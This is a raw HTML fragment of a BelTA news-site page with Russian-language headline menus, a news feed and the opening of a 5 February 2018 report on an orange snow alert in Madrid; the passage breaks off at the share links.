		                                	                	                                                <a href="http://www.belta.by/sport/view/veduschie-begunji-mazurenok-i-german-startujut-v-zimnem-chempionate-belarusi-288061-2018/"  title="Ведущие бегуньи Мазуренок и Герман стартуют в зимнем чемпионате Беларуси" class="fp_rb_news_title">
                    Ведущие бегуньи Мазуренок и Герман стартуют в зимнем чемпионате Беларуси
                    <span class="with_video"></span> 
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/sport/view/basp-nominiroval-darjju-domrachevu-na-priz-world-fair-play-288047-2018/"  title="БАСП номинировал Дарью Домрачеву на приз World Fair Play" class="fp_rb_news_title">
                    БАСП номинировал Дарью Домрачеву на приз World Fair Play
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/sport/view/napadajuschij-kitarov-ne-sygraet-v-sostave-sbornoj-belarusi-po-hokkeju-s-kanadtsami-v-rige-288028-2018/"  title="Нападающий Александр Китаров не сыграет в составе сборной Беларуси по хоккею с канадцами в Риге" class="fp_rb_news_title">
                    Нападающий Александр Китаров не сыграет в составе сборной Беларуси по хоккею с канадцами в Риге
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/sport/view/brestskij-gandbolnyj-klub-imeni-meshkova-oboshel-minskij-ska-v-chempionate-belarusi-287975-2018/"  title="БГК имени Мешкова обыграл минский СКА и обогнал &quot;армейцев&quot; в турнирной таблице чемпионата Беларуси" class="fp_rb_news_title">
                    БГК имени Мешкова обыграл минский СКА и обогнал "армейцев" в турнирной таблице чемпионата Беларуси
                     
                                    </a>
                            </div>
            
    </div>

<div class="lastSuzetHMenu">
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/chempionat-khl-20172018-307/" title="Чемпионат КХЛ-2017/2018">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_372831.jpg" alt="Чемпионат КХЛ-2017/2018" title="Чемпионат КХЛ-2017/2018"/></span>
            
	            <span class="lastSuzetHMenuTitle">Чемпионат КХЛ-2017/2018</span>
    </a>
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/olimpijskie-igry-2018-v-phenchhane-325/" title="Олимпийские игры-2018 в Пхенчхане">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_638960.jpg" alt="Олимпийские игры-2018 в Пхенчхане" title="Олимпийские игры-2018 в Пхенчхане"/></span>
            
	            <span class="lastSuzetHMenuTitle">Олимпийские игры-2018 в Пхенчхане</span>
    </a>
    <a  href="http://www.belta.by/all-rubric-news/viewSuzet/kubok-mira-po-biatlonu-20172018-324/" title="Кубок мира по биатлону-2017/2018">
	            <span class="lastSuzetHMenuImg"><img src="http://www.belta.by/images/storage/news/000001_369285.jpg" alt="Кубок мира по биатлону-2017/2018" title="Кубок мира по биатлону-2017/2018"/></span>
            
	            <span class="lastSuzetHMenuTitle">Кубок мира по биатлону-2017/2018</span>
    </a>
<div class="clear"></div>
</div>


        </div>
    </div>
    	
                    <div class="menu_item "><a   href="http://www.belta.by/kaleidoscope/" title="Калейдоскоп">Калейдоскоп</a>
        <div class="main_lang_second">
            

        <div class="h_menu_tags_tape">
           
            <div><a href="/search/findTags/1305" title="гороскоп">гороскоп</a></div>
           
            <div><a href="/search/findTags/731" title="исследование">исследование</a></div>
           
            <div><a href="/search/findTags/373" title="рейтинг">рейтинг</a></div>
           
            <div><a href="/search/findTags/1204" title="селфи">селфи</a></div>
           
            <div><a href="/search/findTags/134" title="шоу-бизнес">шоу-бизнес</a></div>
                </div>


<div class="h_menu_inmain">
                                    	                	                                                                                                                <a href="http://www.belta.by/kaleidoscope/view/belorus-mihail-sosunov-proshel-v-ukrainskij-golos-287935-2018/"  title="Белорус Михаил Сосунов прошел в украинский &quot;Голос&quot;" class="news_with_rubric_img">
                        <img src="http://www.belta.by/images/storage/news/000029_1517816169_small.jpg" alt="Михаил Сосунов" title="Михаил Сосунов"/>
                    </a>
                                <a href="http://www.belta.by/kaleidoscope/view/belorus-mihail-sosunov-proshel-v-ukrainskij-golos-287935-2018/"  title="Белорус Михаил Сосунов прошел в украинский &quot;Голос&quot;" class="fp_rb_news_title">
                    Белорус Михаил Сосунов прошел в украинский "Голос"
                    <span class="with_video"></span> 
                                    </a>
                </div>

    <div class="h_menu_lenta">
            <div>
		                                	                	                                                <a href="http://www.belta.by/kaleidoscope/view/vyshel-tizer-trejler-filma-mstiteli-vojna-beskonechnosti-288065-2018/"  title="Вышел тизер-трейлер фильма &quot;Мстители: Война бесконечности&quot;" class="fp_rb_news_title">
                    Вышел тизер-трейлер фильма "Мстители: Война бесконечности"
                    <span class="with_video"></span> 
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/kaleidoscope/view/vyshel-trejler-filma-o-hane-solo-288060-2018/"  title="Вышел трейлер фильма о Хане Соло" class="fp_rb_news_title">
                    Вышел трейлер фильма о Хане Соло
                    <span class="with_video"></span> 
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/kaleidoscope/view/valerija-rasskazala-o-podarke-za-million-rossijskih-rublej-ot-filippa-kirkorova-288020-2018/"  title="Валерия рассказала о подарке от Филиппа Киркорова за миллион российских рублей" class="fp_rb_news_title">
                    Валерия рассказала о подарке от Филиппа Киркорова за миллион российских рублей
                     
                                    </a>
                            </div>
            
            <div>
		                                	                	                                                <a href="http://www.belta.by/kaleidoscope/view/uma-turman-popala-v-avariju-vo-vremja-sjemok-ubit-billa-video-288007-2018/"  title="Ума Турман попала в аварию во время съемок &quot;Убить Билла&quot; – видео" class="fp_rb_news_title">
                    Ума Турман попала в аварию во время съемок "Убить Билла" – видео
                    <span class="with_video"></span> 
                                    </a>
                            </div>
            
    </div>



        </div>
    </div>
    	
                    <div class="menu_item "><a   href="http://www.belta.by/search/findTags/1193" title="Репортажи" >Репортажи</a>
        <div class="main_lang_second">
            
        </div>
    </div>
    	
                    <div class="menu_item "><a   href="http://www.belta.by/search/findTags/1251" title="Тесты" >Тесты</a>
        <div class="main_lang_second">
            
        </div>
    </div>
            </div>
    </div>
</div>
	
            <div class="search_btn" onclick="open_search('search')"></div>
<form action="/search/getResultsForPeriod/" id="search">
    <input type="text" name="query" value="" placeholder="Поиск по сайту" class="search_edit"/>
    <input type="hidden" id="group" name="group" value="0"/>
    <div class="fp_search_where"><span id="fp_search_where" onclick="open_block('group_hidden')">Искать везде</span>
        <div class="group_hidden" id="group_hidden"> 
            <div onclick="setAction('group', 'fp_search_where', 0, this)">Искать везде</div>
                            <div onclick="setAction('group', 'fp_search_where', '3', this)">Фото</div>
                           <div onclick="setAction('group', 'fp_search_where', '4', this)">Видео</div>
                           <div onclick="setAction('group', 'fp_search_where', '5', this)">Инфографика</div>
                    </div> 
    </div>
    <input type="hidden" id="period" name="period" value="0"/>
    <div class="fp_search_where"><span id="fp_search_when" onclick="open_block('when_hidden')">За весь период</span>
        <div class="group_hidden" id="when_hidden"> 
            <div onclick="setAction('period', 'fp_search_when', 0, this)">За весь период</div>
            <div onclick="setAction('period', 'fp_search_when', 1, this)">За день</div>
            <div onclick="setAction('period', 'fp_search_when', 2, this)">За неделю</div>
            <div onclick="setAction('period', 'fp_search_when', 3, this)">За месяц</div>
            <div onclick="setAction('period', 'fp_search_when', 4, this)">За год</div>
            
         </div> 
    </div>
    <div class="search_close" onclick="close_search('search')"></div>
    <input type="submit" value="Поиск" class="search_submit" >
    
</form>
   
                    </div>
        </div>
                                                           

        <div class="inner_left_part" id="inner_left_part">
            
    
    
<div class="left_col_tb">
            <div class="left_col">
            
            <div class="last_news last_news_sp">
            <!--noindex-->
	    <div class="main_news_title">Главное</div>
    <div class="last_news_inner">
            <div class="last_news_item">
                                                                            	                	                                                    <a href="http://www.belta.by/president/view/lukashenko-belarus-sdelala-pervyj-shag-v-postroenii-intellektualnoj-ekonomiki-287634-2018/" title="Лукашенко: Беларусь сделала первый шаг в построении интеллектуальной экономики" >
                        <img src="http://www.belta.by/images/storage/news/000019_1517557773_small.jpg" alt="Александр Лукашенко" title="Александр Лукашенко"/>
                    </a>
                               
                <a href="http://www.belta.by/president/view/lukashenko-belarus-sdelala-pervyj-shag-v-postroenii-intellektualnoj-ekonomiki-287634-2018/" title="Лукашенко: Беларусь сделала первый шаг в построении интеллектуальной экономики" class="last_news_title_main" >Лукашенко: Беларусь сделала первый шаг в построении интеллектуальной экономики
                    <span class="with_video"></span> 
                    <span class="with_photo"></span>                </a>
               <div class="news_rubric">Президент</div>        </div>
        
    

	                 <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/society/view/smi-sleduet-byt-bolee-aktivnymi-v-sotsialnyh-setjah-ryzhenkov-288001-2018/" title="СМИ следует быть более активными в социальных сетях - Рыженков"  >СМИ следует быть более активными в социальных сетях - Рыженков
                     
                                    </a>
               <div class="news_rubric">Общество</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/society/view/moroznaja-pogoda-budet-v-belarusi-na-etoj-nedele-287997-2018/" title="Морозная погода будет в Беларуси на этой неделе"  >Морозная погода будет в Беларуси на этой неделе
                     
                                    </a>
               <div class="news_rubric">Общество</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://best-photo.belta.by/january2018" title="Лучшие фото БЕЛТА в январе"  target='_blank'>Лучшие фото БЕЛТА в январе
                     
                                    </a>
               <div class="news_rubric">Культура</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/society/view/na-etoj-stranitse-5-fevralja-budut-opublikovany-pobediteli-rozygrysha-54-go-tura-igry-udacha-v-pridachu-287263-2018/" title="Оперная дива Анастасия Малашкевич разыграла 34-ю квартиру от &quot;Евроопт&quot;! А обладателей автомобилей и крупных денежных призов определили сами покупатели!"  >Оперная дива Анастасия Малашкевич разыграла 34-ю квартиру от "Евроопт"! А обладателей автомобилей и крупных денежных призов определили сами покупатели!
                    <span class="with_video"></span> 
                    <span class="with_photo"></span>                </a>
               <div class="news_rubric">Общество</div>        </div>
         </div>
            <!--/noindex-->
            </div>
                           
                            <div class="bans bannerLeftCol">
                    <a href="http://www.belta.by/advertising/" title="Реклама на сайте"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000141_dc549d9fbb9c044e5f3883bd819779d6_work.jpg" alt="Реклама на сайте" title="Реклама на сайте" />
                    </a>
                </div>                    
           
                    
    
            <!--noindex-->
            <div class="last_news last_news_sp">
    <div class="last_news_title">Лента новостей</div>
    <div class="last_news_scroll">
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/world/view/v-majjami-hozjain-bara-vzjal-v-zalozhniki-okolo-12-chelovek-288075-2018/" title="В Майями хозяин бара взял в заложники около 12 человек"  >В Майями хозяин бара взял в заложники около 12 человек
                     
                                    </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                        01:00
            </span> В мире</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/kaleidoscope/view/akter-aleksej-panin-lishilsja-mashiny-za-dolgi-288074-2018/" title="Актер Алексей Панин лишился машины за долги"  >Актер Алексей Панин лишился машины за долги
                     
                                    </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                        00:49
            </span> Калейдоскоп</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/kaleidoscope/view/andzhelina-dzholi-pojavilas-na-krasnoj-dorozhke-prestizhnoj-premii-s-dochermi-288073-2018/" title="Анджелина Джоли появилась на красной дорожке престижной премии с дочерьми"  >Анджелина Джоли появилась на красной дорожке престижной премии с дочерьми
                     
                    <span class="with_photo"></span>                </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                        00:25
            </span> Калейдоскоп</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/world/view/na-maldivah-vveli-chrezvychajnoe-polozhenie-288072-2018/" title="На Мальдивах ввели чрезвычайное положение"  >На Мальдивах ввели чрезвычайное положение
                     
                                    </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                            Вчера
                        23:35
            </span> В мире</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/kaleidoscope/view/kitajanka-vyprygnula-iz-mchaschejsja-mashiny-i-otdelalas-tsarapinami-288071-2018/" title="Китаянка выпрыгнула из мчащейся машины и отделалась царапинами - видео"  >Китаянка выпрыгнула из мчащейся машины и отделалась царапинами - видео
                     
                                    </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                            Вчера
                        23:10
            </span> Калейдоскоп</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/kaleidoscope/view/vinograd-nazvali-luchshim-lekarstvom-ot-depressii-288070-2018/" title="Виноград назвали лучшим лекарством от депрессии"  >Виноград назвали лучшим лекарством от депрессии
                     
                                    </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                            Вчера
                        22:39
            </span> Калейдоскоп</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/culture/view/junye-vokalisty-minskoj-oblasti-projavjat-svoi-talanty-na-festivale-konkurse-prostoj-motiv-288069-2018/" title="Юные вокалисты Минской области проявят свои таланты на фестивале-конкурсе &quot;Простой мотив&quot;"  >Юные вокалисты Минской области проявят свои таланты на фестивале-конкурсе "Простой мотив"
                     
                                    </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                            Вчера
                        22:07
            </span> Культура</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/tech/view/u-iphone-x-obnaruzhili-novyj-defekt-288068-2018/" title="У iPhone X обнаружили новый дефект"  >У iPhone X обнаружили новый дефект
                     
                                    </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                            Вчера
                        21:59
            </span> Технологии</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/incident/view/paviljon-s-bytovoj-himiej-gorel-na-mini-rynke-v-pinske-288067-2018/" title="Павильон с бытовой химией горел на мини-рынке в Пинске"  >Павильон с бытовой химией горел на мини-рынке в Пинске
                     
                    <span class="with_photo"></span>                </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                            Вчера
                        21:54
            </span> Происшествия</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/sport/view/kapitan-hk-dinamo-minsk-vladimir-denisov-vyveden-iz-spiska-travmirovannyh-288066-2018/" title="Капитан ХК &quot;Динамо-Минск&quot; Владимир Денисов выведен из списка травмированных"  >Капитан ХК "Динамо-Минск" Владимир Денисов выведен из списка травмированных
                     
                                    </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                            Вчера
                        21:37
            </span> Спорт</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/kaleidoscope/view/vyshel-tizer-trejler-filma-mstiteli-vojna-beskonechnosti-288065-2018/" title="Вышел тизер-трейлер фильма &quot;Мстители: Война бесконечности&quot;"  >Вышел тизер-трейлер фильма "Мстители: Война бесконечности"
                    <span class="with_video"></span> 
                                    </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                            Вчера
                        21:23
            </span> Калейдоскоп</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/sport/view/futbolisty-soligorskogo-shahtera-sygrali-vnichjju-brestskoe-dinamo-proigralo-svoj-sparring-288063-2018/" title="Футболисты солигорского &quot;Шахтера&quot; сыграли вничью, брестское &quot;Динамо&quot; проиграло свой спарринг"  >Футболисты солигорского "Шахтера" сыграли вничью, брестское "Динамо" проиграло свой спарринг
                     
                                    </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                            Вчера
                        21:04
            </span> Спорт</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/incident/view/v-gluske-legkovushka-vyletela-na-trotuar-i-sbila-dvuh-peshehodov-288062-2018/" title="В Глуске легковушка вылетела на тротуар и сбила двух пешеходов"  >В Глуске легковушка вылетела на тротуар и сбила двух пешеходов
                     
                                    </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                            Вчера
                        20:58
            </span> Происшествия</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/sport/view/veduschie-begunji-mazurenok-i-german-startujut-v-zimnem-chempionate-belarusi-288061-2018/" title="Ведущие бегуньи Мазуренок и Герман стартуют в зимнем чемпионате Беларуси"  >Ведущие бегуньи Мазуренок и Герман стартуют в зимнем чемпионате Беларуси
                    <span class="with_video"></span> 
                                    </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                            Вчера
                        20:48
            </span> Спорт</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/kaleidoscope/view/vyshel-trejler-filma-o-hane-solo-288060-2018/" title="Вышел трейлер фильма о Хане Соло"  >Вышел трейлер фильма о Хане Соло
                    <span class="with_video"></span> 
                                    </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                            Вчера
                        20:39
            </span> Калейдоскоп</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/tech/view/boeing-predstavil-samolet-novogo-pokolenija-iz-serii-737-max-288059-2018/" title="Boeing представил самолет нового поколения из серии 737 MAX"  >Boeing представил самолет нового поколения из серии 737 MAX
                     
                                    </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                            Вчера
                        20:27
            </span> Технологии</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/regions/view/reportazh-glavnoe-ljudjam-pomoch-288058-2018/" title="РЕПОРТАЖ: Главное - людям помочь"  >РЕПОРТАЖ: Главное - людям помочь
                     
                    <span class="with_photo"></span>                </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                            Вчера
                        19:38
            </span> Регионы</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/sport/view/chetyre-belorusskie-biatlonistki-vystupjat-v-sprinte-na-olimpiade-v-phenchhane-288057-2018/" title="Четыре белорусские биатлонистки выступят в спринте на Олимпиаде в Пхенчхане"  >Четыре белорусские биатлонистки выступят в спринте на Олимпиаде в Пхенчхане
                     
                                    </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                            Вчера
                        19:32
            </span> Спорт</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/culture/view/fotofakt-jubilejnaja-vystavka-leonida-schemeleva-otkrylas-v-natsionalnom-hudozhestvennom-muzee-288056-2018/" title="ФОТОФАКТ: Юбилейная выставка Леонида Щемелева открылась в Национальном художественном музее"  >ФОТОФАКТ: Юбилейная выставка Леонида Щемелева открылась в Национальном художественном музее
                     
                    <span class="with_photo"></span>                </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                            Вчера
                        19:15
            </span> Культура</div>        </div>
            <div class="last_news_item">
                                                                            	                	                                               
                <a href="http://www.belta.by/incident/view/v-minske-zaderzhali-serijnogo-domushnika-288055-2018/" title="В Минске задержали серийного домушника"  >В Минске задержали серийного домушника
                     
                                    </a>
               <div class="news_rubric"><span class="fp_date">           	 		          
                            Вчера
                        18:59
            </span> Происшествия</div>        </div>
        </div>
    <a class="all_news" href="http://www.belta.by/all_news" title="Все новости">Все новости</a> 
</div>

            <!--/noindex-->
            
                        
            <div class="last_news last_news_sp">
    <div class="suzhet_title">Сюжеты</div>
            <div class="suzhet_item">
                            <a  href="http://www.belta.by/all-rubric-news/viewSuzet/chempionat-khl-20172018-307/" title="Чемпионат КХЛ-2017/2018" class="suzhet_item_img">
                    <img src="http://www.belta.by/images/storage/news/000001_372831.jpg" alt="Чемпионат КХЛ-2017/2018" title="Чемпионат КХЛ-2017/2018"/>
                </a>
                        <a href="http://www.belta.by/all-rubric-news/viewSuzet/chempionat-khl-20172018-307/" title="Чемпионат КХЛ-2017/2018">Чемпионат КХЛ-2017/2018</a>
            <div class="clear"></div>
        </div>
            <div class="suzhet_item">
                            <a  href="http://www.belta.by/all-rubric-news/viewSuzet/sodejstvie-zanjatosti-naselenija-333/" title="Содействие занятости населения" class="suzhet_item_img">
                    <img src="http://www.belta.by/images/storage/news/000001_332207.jpg" alt="Содействие занятости населения" title="Содействие занятости населения"/>
                </a>
                        <a href="http://www.belta.by/all-rubric-news/viewSuzet/sodejstvie-zanjatosti-naselenija-333/" title="Содействие занятости населения">Содействие занятости населения</a>
            <div class="clear"></div>
        </div>
            <div class="suzhet_item">
                            <a  href="http://www.belta.by/all-rubric-news/viewSuzet/olimpijskie-igry-2018-v-phenchhane-325/" title="Олимпийские игры-2018 в Пхенчхане" class="suzhet_item_img">
                    <img src="http://www.belta.by/images/storage/news/000001_638960.jpg" alt="Олимпийские игры-2018 в Пхенчхане" title="Олимпийские игры-2018 в Пхенчхане"/>
                </a>
                        <a href="http://www.belta.by/all-rubric-news/viewSuzet/olimpijskie-igry-2018-v-phenchhane-325/" title="Олимпийские игры-2018 в Пхенчхане">Олимпийские игры-2018 в Пхенчхане</a>
            <div class="clear"></div>
        </div>
            <div class="suzhet_item">
                            <a  href="http://www.belta.by/all-rubric-news/viewSuzet/kubok-mira-po-biatlonu-20172018-324/" title="Кубок мира по биатлону-2017/2018" class="suzhet_item_img">
                    <img src="http://www.belta.by/images/storage/news/000001_369285.jpg" alt="Кубок мира по биатлону-2017/2018" title="Кубок мира по биатлону-2017/2018"/>
                </a>
                        <a href="http://www.belta.by/all-rubric-news/viewSuzet/kubok-mira-po-biatlonu-20172018-324/" title="Кубок мира по биатлону-2017/2018">Кубок мира по биатлону-2017/2018</a>
            <div class="clear"></div>
        </div>
            <div class="suzhet_item">
                            <a  href="http://www.belta.by/all-rubric-news/viewSuzet/posevnaja-kampanija-33/" title="Посевная кампания" class="suzhet_item_img">
                    <img src="http://www.belta.by/images/storage/news/000001_759710.jpg" alt="Посевная кампания" title="Посевная кампания"/>
                </a>
                        <a href="http://www.belta.by/all-rubric-news/viewSuzet/posevnaja-kampanija-33/" title="Посевная кампания">Посевная кампания</a>
            <div class="clear"></div>
        </div>
            <div class="suzhet_item">
                            <a  href="http://www.belta.by/all-rubric-news/viewSuzet/situatsija-na-valjutnom-rynke-37/" title="Ситуация на валютном рынке" class="suzhet_item_img">
                    <img src="http://www.belta.by/images/storage/news/000001_906975.jpg" alt="Ситуация на валютном рынке" title="Ситуация на валютном рынке"/>
                </a>
                        <a href="http://www.belta.by/all-rubric-news/viewSuzet/situatsija-na-valjutnom-rynke-37/" title="Ситуация на валютном рынке">Ситуация на валютном рынке</a>
            <div class="clear"></div>
        </div>
        <a class="all_news" href="http://www.belta.by/all-rubric-news/allSuzetes" title="Все сюжеты">Все сюжеты</a> 
</div>
                           
                            <div class="bans bannerLeftCol">
                    <a href="http://president.gov.by/" title="Сайт Президента Беларуси"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000144_543c25a856f7b995d206952d1792cd1c_work.jpg" alt="Сайт Президента Беларуси" title="Сайт Президента Беларуси" />
                    </a>
                </div>                    
           
                    
                   
                            <div class="bans bannerLeftCol">
                    <a href="http://www.soyuz.by/" title="Портал союзного государства"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000144_a8007899e0a0c4f10927ac5be7015974_work.jpg" alt="Портал союзного государства" title="Портал союзного государства" />
                    </a>
                </div>                    
           
                    
                   
                            <div class="bans bannerLeftCol">
                    <a href="http://www.cis.minsk.by/" title="Исполком СНГ"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000144_10386df126bf7a8b77e21d6d625048c7_work.jpg" alt="Исполком СНГ" title="Исполком СНГ" />
                    </a>
                </div>                    
           
                    
                   
                            <div class="bans bannerLeftCol">
                    <a href="http://www.pravo.by/" title="Национальный правовой интернет-портал"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000144_7970573e56db2eeb0e74f8e99b9eed3e_work.jpg" alt="Национальный правовой интернет-портал" title="Национальный правовой интернет-портал" />
                    </a>
                </div>                    
           
                    
                   
                            <div class="bans bannerLeftCol">
                    <a href="http://belsmi.by/" title="СМИ Беларуси"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000144_e4f676390f0374e2363120c274a3d408_work.jpg" alt="СМИ Беларуси" title="СМИ Беларуси" />
                    </a>
                </div>                    
           
                    
    
        </div>    <div class="center_col">
            
    <h1>Оранжевый уровень опасности объявлен в Мадриде из-за снегопада</h1>
    <div class="sp_date">
         
                <a href="http://www.belta.by/world/" title="В мире">В мире</a>
        05.02.2018 | 17:15
                        <div class="share">                                                                
                                                                                                                                                                                                                            <a href="https://www.facebook.com/sharer.php?s=100&u=http%3A%2F%2Fwww.belta.by%2Fworld%2Fview%2Foranzhevyj-uroven-opasnosti-objjavlen-v-madride-iz-za-snegopada-288043-2018%2F&t=%D0%9E%D1%80%D0%B0%D0%BD%D0%B6%D0%B5%D0%B2%D1%8B%D0%B9%20%D1%83%D1%80%D0%BE%D0%B2%D0%B5%D0%BD%D1%8C%20%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8%20%D0%BE%D0%B1%D1%8A%D1%8F%D0%B2%D0%BB%D0%B5%D0%BD%20%D0%B2%20%D0%9C%D0%B0%D0%B4%D1%80%D0%B8%D0%B4%D0%B5%20%D0%B8%D0%B7-%D0%B7%D0%B0%20%D1%81%D0%BD%D0%B5%D0%B3%D0%BE%D0%BF%D0%B0%D0%B4%D0%B0&p[images][0]=http%3A%2F%2Fwww.belta.by%2Fimages%2Fstorage%2Fnews%2F000026_1517840719_big.jpg" target="_blank" class="facebook">f</a>                <a href="http://vk.com/share.php?url=http%3A%2F%2Fwww.belta.by%2Fworld%2Fview%2Foranzhevyj-uroven-opasnosti-objjavlen-v-madride-iz-za-snegopada-288043-2018%2F&title=%D0%9E%D1%80%D0%B0%D0%BD%D0%B6%D0%B5%D0%B2%D1%8B%D0%B9%20%D1%83%D1%80%D0%BE%D0%B2%D0%B5%D0%BD%D1%8C%20%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8%20%D0%BE%D0%B1%D1%8A%D1%8F%D0%B2%D0%BB%D0%B5%D0%BD%20%D0%B2%20%D0%9C%D0%B0%D0%B4%D1%80%D0%B8%D0%B4%D0%B5%20%D0%B8%D0%B7-%D0%B7%D0%B0%20%D1%81%D0%BD%D0%B5%D0%B3%D0%BE%D0%BF%D0%B0%D0%B4%D0%B0&description=%D0%98%D0%B7-%D0%B7%D0%B0%20%D1%81%D0%BD%D0%B5%D0%B6%D0%BD%D1%8B%D1%85%20%D0%B7%D0%B0%D0%BD%D0%BE%D1%81%D0%BE%D0%B2%20%D0%B8%20%D0%BE%D0%B1%D0%BB%D0%B5%D0%B4%D0%B5%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F%20%D0%B7%D0%B0%D1%82%D1%80%D1%83%D0%B4%D0%BD%D0%B5%D0%BD%D0%BE%20%D0%B4%D0%B2%D0%B8%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5%20%D0%BD%D0%B0%20387%20%D1%82%D1%80%D0%B0%D1%81%D1%81%D0%B0%D1%85%20%D1%81%D1%82%D1%80%D0%B0%D0%BD%D1%8B%2C%2056%20%D0%B8%D0%B7%20%D0%BD%D0%B8%D1%85%20%D0%BF%D0%B5%D1%80%D0%B5%D0%BA%D1%80%D1%8B%D1%82%D1%8B.%20%D0%94%D0%BE%D1%80%D0%BE%D0%B6%D0%BD%D1%8B%D0%B5%20%D1%81%D0%BB%D1%83%D0%B6%D0%B1%D1%8B%20%D1%81%D0%BE%D0%B2%D0%B5%D1%82%D1%83%D1%8E%D1%82%20%D0%B2%D0%BE%D0%B4%D0%B8%D1%82%D0%B5%D0%BB%D1%8F%D0%BC%20%D0%BF%D0%BE%20%D0%B2%D0%BE%D0%B7%D0%BC%D0%BE%D0%B6%D0%BD%D0%BE%D1%81%D1%82%D0%B8%20%D0%B2%D0%BE%D0%B7%D0%B4%D0%B5%D1%80%D0%B6%D0%B0%D1%82%D1%8C%D1%81%D1%8F%20%D0%BE%D1%82%20%D0%BF%D0%BE%D0%B5%D0%B7%D0%B4%D0%BE%D0%BA.&image=http%3A%2F%2Fwww.belta.by%2Fimages%2Fstorage%2Fnews%2F000026_1517840719_big.jpg&noparse=true" target="_blank" class="vk">vk</a>                <a href="http://www.odnoklassniki.ru/dk?st.cmd=addShare&st.s=1?&st._surl=http%3A%2F%2Fwww.belta.by%2Fworld%2Fview%2Foranzhevyj-uroven-opasnosti-objjavlen-v-madride-iz-za-snegopada-288043-2018%2F&st.comments=%D0%9E%D1%80%D0%B0%D0%BD%D0%B6%D0%B5%D0%B2%D1%8B%D0%B9%20%D1%83%D1%80%D0%BE%D0%B2%D0%B5%D0%BD%D1%8C%20%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8%20%D0%BE%D0%B1%D1%8A%D1%8F%D0%B2%D0%BB%D0%B5%D0%BD%20%D0%B2%20%D0%9C%D0%B0%D0%B4%D1%80%D0%B8%D0%B4%D0%B5%20%D0%B8%D0%B7-%D0%B7%D0%B0%20%D1%81%D0%BD%D0%B5%D0%B3%D0%BE%D0%BF%D0%B0%D0%B4%D0%B0" target="_blank" class="ok">ok</a>                <a 